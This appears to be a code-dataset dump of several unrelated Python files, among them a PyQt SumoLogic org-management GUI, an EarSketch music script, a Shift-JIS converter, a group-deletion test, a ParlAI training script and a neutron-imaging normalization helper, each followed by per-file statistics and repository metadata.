str(self.mainwindow.lineEditPasswordLeft.text())
))
self.pushButtonUpdateSubscription.clicked.connect(lambda: self.update_subscription(
self.tableWidgetOrgs.selectedItems(),
str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
str(self.mainwindow.lineEditUserNameLeft.text()),
str(self.mainwindow.lineEditPasswordLeft.text())
))
self.tableWidgetOrgs.itemDoubleClicked.connect(self.row_doubleclicked)
def row_doubleclicked(self, qtablewidgetitem):
selected = self.tableWidgetOrgs.selectedItems()
row_dict = self.create_dict_from_qtable_row(selected)
def create_dict_from_qtable_row(self, list_of_qtableitems):
row_dict = {}
for qtableitem in list_of_qtableitems:
column_number = qtableitem.column()
key = self.tableWidgetOrgs.horizontalHeaderItem(column_number).text()
row_dict[key] = qtableitem.text()
return row_dict
def reset_stateful_objects(self, side='both'):
self.tableWidgetOrgs.clearContents()
self.tableWidgetOrgs.raw_orgs =[]
self.tableWidgetOrgs.horizontalHeader().hide()
self.tableWidgetOrgs.setRowCount(0)
parent_deployment = str(self.mainwindow.comboBoxRegionLeft.currentText().lower())
id = str(self.mainwindow.lineEditUserNameLeft.text())
key = str(self.mainwindow.lineEditPasswordLeft.text())
self.pushButtonGetOrgs.setEnabled(True)
self.checkBoxShowActive.setEnabled(True)
self.pushButtonCreateOrg.setEnabled(True)
self.pushButtonUpdateSubscription.setEnabled(True)
self.pushButtonCancelSubscription.setEnabled(True)
try:
sumo_mam = SumoLogic_Orgs(id, key, parent_deployment, log_level=self.mainwindow.log_level)
test = sumo_mam.get_deployments()
except:
self.pushButtonGetOrgs.setEnabled(False)
self.checkBoxShowActive.setEnabled(False)
self.pushButtonCreateOrg.setEnabled(False)
self.pushButtonUpdateSubscription.setEnabled(False)
self.pushButtonCancelSubscription.setEnabled(False)
def update_org_list(self, parent_deployment, id, key):
logger.info("[Organizations] Getting Updated Org List")
if self.checkBoxShowActive.isChecked():
status_filter= "Active"
else:
status_filter= "All"
try:
sumo_mam = SumoLogic_Orgs(id, key, parent_deployment, log_level=self.mainwindow.log_level)
self.tableWidgetOrgs.raw_orgs = sumo_mam.get_orgs_sync(status_filter=status_filter)
self.update_org_table_widget()
except Exception as e:
logger.exception(e)
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
self.reset_stateful_objects('left')
return
def update_org_table_widget(self):
logger.info("[Organizations] Updating Org Table Widget")
self.tableWidgetOrgs.clear()
orgs = []
for raw_org in self.tableWidgetOrgs.raw_orgs:
org = { 'Org Name': raw_org['organizationName'],
'Org ID': raw_org['orgId'],
'Owner Email': raw_org['email'],
'Credits': raw_org['subscription']['credits'],
'License': raw_org['subscription']['plan']['planName'],
'Status': raw_org['subscription']['status'],
'Continuous Ingest': raw_org['subscription']['baselines']['continuousIngest'],
'Continuous Storage': raw_org['subscription']['baselines']['continuousStorage'],
'Frequent Ingest': raw_org['subscription']['baselines']['frequentIngest'],
'Frequent Storage': raw_org['subscription']['baselines']['frequentStorage'],
'Infrequent Ingest': raw_org['subscription']['baselines']['infrequentIngest'],
'Infrequent Storage': raw_org['subscription']['baselines']['infrequentStorage'],
'CSE Ingest': raw_org['subscription']['baselines']['cseIngest'],
'CSE Storage': raw_org['subscription']['baselines']['cseStorage'],
'Metrics': raw_org['subscription']['baselines']['metrics']
}
orgs.append(org)
if len(orgs) > 0:
numrows = len(orgs)
self.tableWidgetOrgs.setRowCount(numrows)
numcolumns = len(orgs[0])
self.tableWidgetOrgs.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
self.tableWidgetOrgs.setColumnCount(numcolumns)
self.tableWidgetOrgs.horizontalHeader().show()
self.tableWidgetOrgs.setHorizontalHeaderLabels((list(orgs[0].keys())))
for row in range(numrows):
for column in range(numcolumns):
entry = (list(orgs[row].values())[column])
item = QtWidgets.QTableWidgetItem()
item.setData(QtCore.Qt.DisplayRole, entry)
self.tableWidgetOrgs.setItem(row, column, item)
else:
self.mainwindow.errorbox('No orgs to display.')
def create_org(self, parent_deployment, id, key):
logger.info("[Organizations]Creating Org")
try:
sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment, log_level=self.mainwindow.log_level)
deployments = sumo_orgs.get_deployments()
org_info = sumo_orgs.get_parent_org_info()
trials_enabled = org_info['isEligibleForTrialOrgs']
except Exception as e:
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
logger.exception(e)
return
dialog = CreateOrUpdateOrgDialog(deployments, trials_enabled=trials_enabled)
dialog.exec()
dialog.show()
if str(dialog.result()) == '1':
org_details = dialog.getresults()
try:
response = sumo_orgs.create_org(org_details)
dialog.close()
except Exception as e:
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
logger.exception(e)
dialog.close()
return
# if org_details['create_preset']:
# self.mainwindow.create_preset_non_interactive(response_dict['organizationName'],
# response_dict['deploymentId'],
# response_dict['accessKey']['id'],
# response_dict['accessKey']['key']
# )
# if org_details['write_creds_to_file']:
# savepath = QtWidgets.QFileDialog.getExistingDirectory(self, 'Save Credentials Location')
# file = pathlib.Path(savepath + r'/' + str(response_dict['organizationName'] + r'.user.json'))
# try:
# with open(str(file), 'w') as filepointer:
# json.dump(response_dict, filepointer)
#
# except Exception as e:
# self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
# logger.exception(e)
# # secure the credentials file
# os.chmod(file, 600)
self.update_org_list(parent_deployment, id, key)
else:
return
def cancel_subscription(self, selected_row, parent_deployment, id, key):
if len(selected_row) > 0:
logger.info("[Organizations] Canceling Subscription")
row_dict = self.create_dict_from_qtable_row(selected_row)
try:
sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment=parent_deployment)
sumo_orgs.deactivate_org(row_dict['Org ID'])
except Exception as e:
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
logger.exception(e)
return
self.update_org_list(parent_deployment, id, key)
return
else:
self.mainwindow.errorbox('Nothing Selected')
def update_subscription(self, selected_row, parent_deployment, id, key):
if len(selected_row) > 0:
logger.info("[Organizations] Updating Subscription")
row_dict = self.create_dict_from_qtable_row(selected_row)
try:
sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment)
org_details = sumo_orgs.get_org_details(row_dict['Org ID'])
deployments = sumo_orgs.get_deployments()
org_info = sumo_orgs.get_parent_org_info()
trials_enabled = org_info['isEligibleForTrialOrgs']
except Exception as e:
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
logger.exception(e)
return
dialog = CreateOrUpdateOrgDialog(deployments, org_details=org_details, trials_enabled=trials_enabled)
dialog.exec()
dialog.show()
if str(dialog.result()) == '1':
org_update_details = dialog.getresults()
try:
response = sumo_orgs.update_org(org_details['orgId'], org_update_details['baselines'])
except Exception as e:
self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
logger.exception(e)
dialog.close()
dialog.close()
self.update_org_list(parent_deployment, id, key)
| 48.247723
| 127
| 0.669435
| 2,310
| 26,488
| 7.572727
| 0.149784
| 0.015206
| 0.015206
| 0.022352
| 0.213743
| 0.186875
| 0.181387
| 0.152232
| 0.134625
| 0.126965
| 0
| 0.004849
| 0.229198
| 26,488
| 548
| 128
| 48.335766
| 0.851937
| 0.042623
| 0
| 0.201422
| 0
| 0
| 0.100122
| 0.005132
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028436
| false
| 0.011848
| 0.014218
| 0
| 0.07109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759a0430a9251f3f49f413680d321c1b741036a9
| 562
|
py
|
Python
|
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
#Code
# python code
# script_name: hello
#
# author: Siddharth
# description: composition
#
# set up
from earsketch import *
# Initialized
init()
setTempo(120)
# varible
chord = RD_UK_HOUSE__5THCHORD_2
secondarybeat = HIPHOP_BASSSUB_001
mainbeat = HOUSE_MAIN_BEAT_003
# Music
fitMedia(chord, 1, 1, 16)
setEffect(1, VOLUME, GAIN, -60, 1, 5, 12)
setEffect(1, VOLUME, GAIN, 5, 12, -60, 16)
fitMedia(secondarybeat, 2, 1, 12)
setEffect(2, DELAY, DELAY_TIME, 500)
fitMedia(mainbeat, 3, 1, 8)
setEffect(2, REVERB, REVERB_TIME, 200)
# Finish
finish()
| 17.030303
| 42
| 0.709964
| 81
| 562
| 4.765432
| 0.62963
| 0.051813
| 0.082902
| 0.103627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09636
| 0.169039
| 562
| 33
| 43
| 17.030303
| 0.730193
| 0.233096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759a621d0c21d47983881f0990e0d95c9d89af8b
| 575
|
py
|
Python
|
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
import codecs
import os
codecs.register_error('none', lambda e: ('?', e.end))
def utf8_to_sjis(files, in_dir, out_dir):
os.makedirs(out_dir, exist_ok=True)
for f in files:
utf8_to_sjis_one(f, in_dir, out_dir)
def utf8_to_sjis_one(file, in_dir, out_dir):
with open(f'{in_dir}/{file}', mode='r', encoding='utf-8') as fi:
with open(f'{out_dir}/{file}', mode='w', encoding='sjis', errors='none') as fo:
fo.write(fi.read())
if __name__=='__main__':
files = [
'test_file.csv'
]
in_dir = 'in_utf8'
out_dir = 'sjis'
utf8_to_sjis(files, in_dir, out_dir)
| 19.166667
| 81
| 0.673043
| 104
| 575
| 3.384615
| 0.423077
| 0.119318
| 0.113636
| 0.125
| 0.147727
| 0.147727
| 0.147727
| 0.147727
| 0
| 0
| 0
| 0.01227
| 0.149565
| 575
| 29
| 82
| 19.827586
| 0.707566
| 0
| 0
| 0
| 0
| 0
| 0.144852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759ce6e746deead9ce63c2abe9211efd40789622
| 904
|
py
|
Python
|
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
import random
from model.group import Group
def test_group_removal(app, db, check_ui):
old_group_list = db.get_group_list()
group = random.choice(old_group_list)
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test_group_random_name", header="random_header", footer="random_footer"))
app.group.delete_group_by_id(group.id)
assert app.group.count() == len(old_group_list) - 1
new_group_list = db.get_group_list()
old_group_list.remove(group)
assert old_group_list == new_group_list
if check_ui: # this will execute when "--check_ui" run option is added
def clean(group): # this func removes spaces from group names
return Group(id=group.id, name=group.name.strip())
db_list = map(clean, new_group_list)
assert sorted(db_list, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| 45.2
| 110
| 0.713496
| 145
| 904
| 4.151724
| 0.351724
| 0.179402
| 0.099668
| 0.069767
| 0.139535
| 0.139535
| 0
| 0
| 0
| 0
| 0
| 0.002677
| 0.173673
| 904
| 19
| 111
| 47.578947
| 0.803213
| 0.107301
| 0
| 0
| 0
| 0
| 0.059701
| 0.027363
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.117647
| false
| 0
| 0.117647
| 0.058824
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759d23943bc7a51dc76aa89f5a85cc113775bdad
| 1,946
|
py
|
Python
|
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | 2
|
2021-09-06T16:58:53.000Z
|
2022-01-14T04:17:48.000Z
|
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | null | null | null |
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | 1
|
2022-01-14T09:01:41.000Z
|
2022-01-14T09:01:41.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.scripts.train_model import setup_args, TrainLoop
if __name__ == '__main__':
parser = setup_args()
parser.set_defaults(
task='wizard_of_wikipedia_ko:generator:train',
model='projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent',
model_file='/tmp/end2end_generator/model',
t5_model_arch='pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K',
text_truncate=256,
ln='ko',
log_every_n_secs=10,
validation_patience=12,
validation_metric='ppl',
validation_metric_mode='min',
validation_every_n_epochs=0.5,
truncate=256,
max_knowledge=32,
knowledge_alpha=0.95,
knowledge_truncate=64,
learningrate=5e-4,
warmup_updates=5000,
clip=0.1,
lr_scheduler='invsqrt',
embedding_type='fasttext',
beam_size=1,
skip_generation=False,
batchsize=64,
)
TrainLoop(parser.parse_args()).train()
# parlai train_model -m projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent -mf model/ke-t5_test -t wizard_of_wikipedia_ko:generator:random_split --ln en -bs 4 -eps 1 -lr 1e-5 --num-epochs 1 --optimizer adam --t5-model-arch pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K --text_truncate 512
# parlai train_model -t wizard_of_wikipedia_ko:generator:random_split --ln ke_mix -m projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent -mf model/ke-t5_test --t5-model-arch ../pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K --log-every-n-secs 10 --validation-patience 12 --validation-metric ppl --validation-metric-mode min --validation-every-n-epochs 0.5 -bs 4 --max_knowledge 32 --num-epochs 1
| 48.65
| 424
| 0.722508
| 286
| 1,946
| 4.632867
| 0.426573
| 0.036226
| 0.076981
| 0.086038
| 0.541887
| 0.520755
| 0.520755
| 0.520755
| 0.480755
| 0.417358
| 0
| 0.054523
| 0.170606
| 1,946
| 40
| 424
| 48.65
| 0.766419
| 0.476876
| 0
| 0
| 0
| 0
| 0.218379
| 0.187747
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759dbd8419466a5b58d9ed3efce98d055fc109cf
| 37,914
|
py
|
Python
|
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import collections
import numpy as np
from ipywidgets import widgets
from IPython.core.display import display, HTML
import logging
from NeuNorm.normalization import Normalization
from __code import file_handler
from __code.ipywe import myfileselector
from __code.normalization.get import Get
from __code.normalization.metadata_handler import MetadataHandler, MetadataName, METADATA_KEYS
from __code.normalization import utilities
JSON_DEBUGGING = False
MAX_DF_COUNTS_ALLOWED = 900
METADATA_ERROR_ALLOWED = 1
LIST_METADATA_NOT_INSTRUMENT_RELATED = ['filename', 'time_stamp', 'time_stamp_user_format']
class NormalizationWithSimplifySelection:
working_dir = ''
def __init__(self, working_dir=''):
self.working_dir = working_dir
self.list_of_images = []
self.input_data_folder = []
# {0: {65027: 55.0,
# 65028: 59.2,
# 65029: 1.0,
# 'filename': 'full_filename',
# 'time_stamp': 1454544.34545,
# 'time_stamp_user_format': '2019-11-19 02:48:47'},
# ...,
# }
self.sample_metadata_dict = {}
self.ob_metadata_dict = {}
self.df_metadata_dict = {}
# key of dictionary being the acquisition time
# {50: {'config0': {'list_sample': [self.sample_metadata_dict[0],
# self.sample_metadata_dict[1],..],
# 'list_ob': [self.ob_metadata_dict[0],
# self.ob_metadata_dict[1],
# ...],
# 'list_df': [file1, file2, file3],
# 'metadata_infos': {},
# 'first_images': {'sample': {},
# 'ob': {},
# 'df': {}},
# 'last_images': {'sample': {},
# 'ob': {},
# 'df': {}},
# 'time_range_s_selected': {'before': np.NaN,
# 'after': np.NaN},
# 'time_range_s': {'before': np.NaN,
# 'after': np.NaN},
# },
# 'config1': {...},
# },
# 30: {...},
# }
self.final_full_master_dict = {}
# same as the final_full_master_dict but in this one, the OB outside the time range
# defined as excluded
self.final_with_time_range_master_dict = {}
o_get = Get(parent=self)
log_file_name = o_get.log_file_name()
logging.basicConfig(filename=log_file_name,
filemode='w',
format='[%(levelname)s] - %(asctime)s - %(message)s',
level=logging.INFO) # logging.INFO, logging.DEBUG
logging.info("*** Starting new session ***")
def select_sample_folder(self):
folder_sample_widget = myfileselector.MyFileSelectorPanel(instruction='select folder of images to normalize',
start_dir=self.working_dir,
next=self.retrieve_sample_metadata_from_sample_folder,
type='directory',
multiple=False)
folder_sample_widget.show()
def retrieve_sample_metadata_from_sample_folder(self, sample_folder):
logging.info(f"select sample folder: {sample_folder}")
[list_of_images, _] = file_handler.retrieve_list_of_most_dominant_extension_from_folder(folder=sample_folder)
can_we_continue = self.images_files_found_in_list(list_of_images)
if can_we_continue:
logging.info(f"-> number of images found: {len(list_of_images)}")
self.retrieve_sample_metadata(list_of_images)
else:
logging.info(f"-> No images found!")
display(HTML('<span style="font-size: 20px; color:Red">No images found in the folder selected!</span>'))
def images_files_found_in_list(self, list_of_images):
for _file in list_of_images:
if (".tiff" in _file) or (".tif" in _file) or (".fits" in _file):
return True
return False
def retrieve_sample_metadata(self, list_of_images):
__name__ = "retrieve_sample_metadata"
logging.info(f"Retrieving sample metadata ({__name__})")
self.list_of_images = list_of_images
self.sample_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_images,
display_infos=False,
label='sample')
# logging.info(f"self.sample_metadata_dict: {self.sample_metadata_dict}")
self.auto_retrieve_ob_metadata()
self.auto_retrieve_df_metadata()
self.match_files()
self.calculate_first_and_last_ob()
self.calculate_time_range()
self.display_time_range_selection_widgets()
def select_ob_folder(self):
self.select_folder(message='open beam',
next_function=self.retrieve_ob_metadata())
def retrieve_ob_metadata(self, selected_folder):
list_of_ob_files = Get.list_of_tiff_files(folder=selected_folder)
self.ob_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_ob_files)
def auto_retrieve_ob_metadata(self):
logging.info(f"> auto_retrieve_ob_metadata")
folder = os.path.join(self.working_dir, 'raw', 'ob')
logging.info(f"-> folder: {folder}")
list_of_ob_files = file_handler.get_list_of_all_files_in_subfolders(folder=folder,
extensions=['tiff', 'tif'])
logging.info(f"-> nbr of ob files found: {len(list_of_ob_files)}")
self.ob_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_ob_files,
label='ob')
# logging.info(f"ob metadata dict")
# logging.info(f"-> {self.ob_metadata_dict}")
def select_folder(self, message="", next_function=None):
folder_widget = myfileselector.MyFileSelectorPanel(instruction='select {} folder'.format(message),
start_dir=self.working_dir,
next=next_function,
type='directory',
multiple=False)
folder_widget.show()
def select_df_folder(self):
self.select_folder(message='dark field',
next_function=self.retrieve_df_metadata())
def retrieve_df_metadata(self, selected_folder):
list_of_df_files = Get.list_of_tiff_files(folder=selected_folder)
self.df_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_df_files)
def auto_retrieve_df_metadata(self):
folder = os.path.join(self.working_dir, 'raw', 'df')
list_of_df_files = file_handler.get_list_of_all_files_in_subfolders(folder=folder,
extensions=['tiff', 'tif'])
logging.info(f"-> nbr of df files found: {len(list_of_df_files)}")
self.df_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_df_files,
label='df')
def match_files(self):
"""This is where the files will be associated with their respective OB, DF by using the metadata"""
if not JSON_DEBUGGING:
self.create_master_sample_dict()
self.match_ob()
self.match_df()
if JSON_DEBUGGING:
# for debugging only, exporting the json
import json
with open('/Users/j35/Desktop/which_ob_and_df_to_use.json', 'w') as outfile:
json.dump(self.final_full_master_dict, outfile)
def match_ob(self):
"""we will go through all the ob and associate them with the right sample based on
- acquisition time
- detector type
- aperture
"""
list_ob_dict = self.ob_metadata_dict
final_full_master_dict = self.final_full_master_dict
list_of_sample_acquisition = final_full_master_dict.keys()
for _index_ob in list_ob_dict.keys():
_all_ob_instrument_metadata = Get.get_instrument_metadata_only(list_ob_dict[_index_ob])
_ob_instrument_metadata = utilities.isolate_instrument_metadata(
_all_ob_instrument_metadata)
_acquisition_time = _all_ob_instrument_metadata[MetadataName.EXPOSURE_TIME.value]['value']
if _acquisition_time in list_of_sample_acquisition:
for _config_id in final_full_master_dict[_acquisition_time].keys():
_sample_metadata_infos = final_full_master_dict[_acquisition_time][_config_id]['metadata_infos']
if utilities.all_metadata_match(_sample_metadata_infos, _ob_instrument_metadata):
final_full_master_dict[_acquisition_time][_config_id]['list_ob'].append(list_ob_dict[_index_ob])
self.final_full_master_dict = final_full_master_dict
def match_df(self):
"""
we will go through all the df of the IPTS and will associate the df with the right samples
based on:
- detector type used
- acquisition time
"""
list_df_dict = self.df_metadata_dict
final_full_master_dict = self.final_full_master_dict
list_of_sample_acquisition = final_full_master_dict.keys()
for _index_df in list_df_dict.keys():
_all_df_instrument_metadata = Get.get_instrument_metadata_only(list_df_dict[_index_df])
_df_instrument_metadata = utilities.isolate_instrument_metadata(
_all_df_instrument_metadata)
_acquisition_time = _all_df_instrument_metadata[MetadataName.EXPOSURE_TIME.value]['value']
if _acquisition_time in list_of_sample_acquisition:
for _config_id in final_full_master_dict[_acquisition_time].keys():
_sample_metadata_infos = final_full_master_dict[_acquisition_time][_config_id]['metadata_infos']
if utilities.all_metadata_match(_sample_metadata_infos, _df_instrument_metadata,
list_key_to_check=[METADATA_KEYS['df'][
1].value]):
final_full_master_dict[_acquisition_time][_config_id]['list_df'].append(list_df_dict[_index_df])
self.final_full_master_dict = final_full_master_dict
def create_master_sample_dict(self):
final_full_master_dict = collections.OrderedDict()
sample_metadata_dict = self.sample_metadata_dict
# we need to keep record of which image was the first one taken and which image was the last one taken
first_sample_image = sample_metadata_dict[0]
last_sample_image = sample_metadata_dict[0]
for _file_index in sample_metadata_dict.keys():
_dict_file_index = sample_metadata_dict[_file_index]
_sample_file = _dict_file_index['filename']
_acquisition_time = _dict_file_index[MetadataName.EXPOSURE_TIME.value]['value']
_instrument_metadata = utilities.isolate_instrument_metadata(_dict_file_index)
_sample_time_stamp = _dict_file_index['time_stamp']
# find which image was first and which image was last
if _sample_time_stamp < first_sample_image['time_stamp']:
first_sample_image = _dict_file_index
elif _sample_time_stamp > last_sample_image['time_stamp']:
last_sample_image = _dict_file_index
# first entry or first time seeing that acquisition time
if (len(final_full_master_dict) == 0) or not (_acquisition_time in final_full_master_dict.keys()):
_first_images_dict = {'sample': first_sample_image,
'ob' : {},
'df' : {}}
_last_images_dict = {'sample': last_sample_image,
'ob' : {},
'df' : {}}
_temp_dict = {'list_sample' : [_dict_file_index],
'first_images' : _first_images_dict,
'last_images' : _last_images_dict,
'list_ob' : [],
'list_df' : [],
'time_range_s_selected': {'before': np.NaN,
'after' : np.NaN},
'time_range_s' : {'before': np.NaN,
'after' : np.NaN},
'metadata_infos' : Get.get_instrument_metadata_only(
_instrument_metadata)}
final_full_master_dict[_acquisition_time] = {}
final_full_master_dict[_acquisition_time]['config0'] = _temp_dict
else:
# check that all the metadata_infos match for the first group of that acquisition time,
# otherwise check the next one or create a group
if _acquisition_time in final_full_master_dict.keys():
_dict_for_this_acquisition_time = final_full_master_dict[_acquisition_time]
_found_a_match = False
for _config_key in _dict_for_this_acquisition_time.keys():
_config = _dict_for_this_acquisition_time[_config_key]
if (utilities.all_metadata_match(metadata_1=_config['metadata_infos'],
metadata_2=_instrument_metadata)):
_config['list_sample'].append(_dict_file_index)
_first_images_dict = {'sample': first_sample_image,
'ob' : {},
'df' : {}}
_last_images_dict = {'sample': last_sample_image,
'ob' : {},
'df' : {}}
_config['first_images'] = _first_images_dict
_config['last_images'] = _last_images_dict
_found_a_match = True
if not _found_a_match:
_first_images_dict = {'sample': first_sample_image,
'ob' : {},
'df' : {}}
_last_images_dict = {'sample': last_sample_image,
'ob' : {},
'df' : {}}
_temp_dict = {'list_sample' : [_dict_file_index],
'first_images' : _first_images_dict,
'last_images' : _last_images_dict,
'list_ob' : [],
'list_df' : [],
'time_range_s_selected': {'before': np.NaN,
'after' : np.NaN},
'time_range_s' : {'before': np.NaN,
'after' : np.NaN},
'metadata_infos' : Get.get_instrument_metadata_only(
_instrument_metadata)}
nbr_config = len(_dict_for_this_acquisition_time.keys())
_dict_for_this_acquisition_time['config{}'.format(nbr_config)] = _temp_dict
else:
_first_images_dict = {'sample': first_sample_image,
'ob' : {},
'df' : {}}
_last_images_dict = {'sample': last_sample_image,
'ob' : {},
'df' : {}}
_temp_dict = {'list_sample' : [_dict_file_index],
'first_images' : _first_images_dict,
'last_images' : _last_images_dict,
'list_ob' : [],
'list_df' : [],
'time_range_s_selected': {'before': np.NAN,
'after' : np.NaN},
'time_range_s' : {'before': np.NaN,
'after' : np.NaN},
'metadata_infos' : Get.get_instrument_metadata_only(
_instrument_metadata)}
final_full_master_dict[_acquisition_time] = {}
final_full_master_dict[_acquisition_time]['config0'] = _temp_dict
self.final_full_master_dict = final_full_master_dict
def calculate_first_and_last_ob(self):
"""this will loop through all the acquisition time keys, and config keys, to figure out
what is the first ob and last ob in this dictionary"""
_final_full_master_dict = self.final_full_master_dict
for _acquisition in _final_full_master_dict.keys():
current_acquisition_dict = _final_full_master_dict[_acquisition]
_first_ob_time = np.NaN
_first_ob = {}
_last_ob_time = np.NaN
_last_ob = {}
for _config in current_acquisition_dict.keys():
current_acquisition_config_dict = current_acquisition_dict[_config]
for _ob in current_acquisition_config_dict['list_ob']:
_current_ob_time = _ob['time_stamp']
if np.isnan(_first_ob_time):
_first_ob_time = _current_ob_time
_last_ob_time = _current_ob_time
_first_ob = _last_ob = _ob
elif _current_ob_time < _first_ob_time:
_first_ob_time = _current_ob_time
_first_ob = _ob
elif _current_ob_time > _last_ob_time:
_last_ob_time = _current_ob_time
_last_ob = _ob
current_acquisition_config_dict['first_images']['ob'] = _first_ob
current_acquisition_config_dict['last_images']['ob'] = _last_ob
def calculate_time_range(self):
"""this method will calculate the max time range of OB taken before or after and will use that
for the slider selection time range
Provide option to use all (that means, do not used any time range)
"""
_final_full_master_dict = self.final_full_master_dict
for _acquisition in _final_full_master_dict.keys():
current_acquisition_dict = _final_full_master_dict[_acquisition]
for _config in current_acquisition_dict.keys():
current_acquisition_config_dict = current_acquisition_dict[_config]
first_sample_image = current_acquisition_config_dict['first_images']['sample']
first_ob_image = current_acquisition_config_dict['first_images']['ob']
delta_time_before = first_sample_image.get('time_stamp', 0) - first_ob_image.get('time_stamp', 0)
_time_range_s_before = delta_time_before if delta_time_before > 0 else 0
last_sample_image = current_acquisition_config_dict['last_images']['sample']
last_ob_image = current_acquisition_config_dict['last_images']['ob']
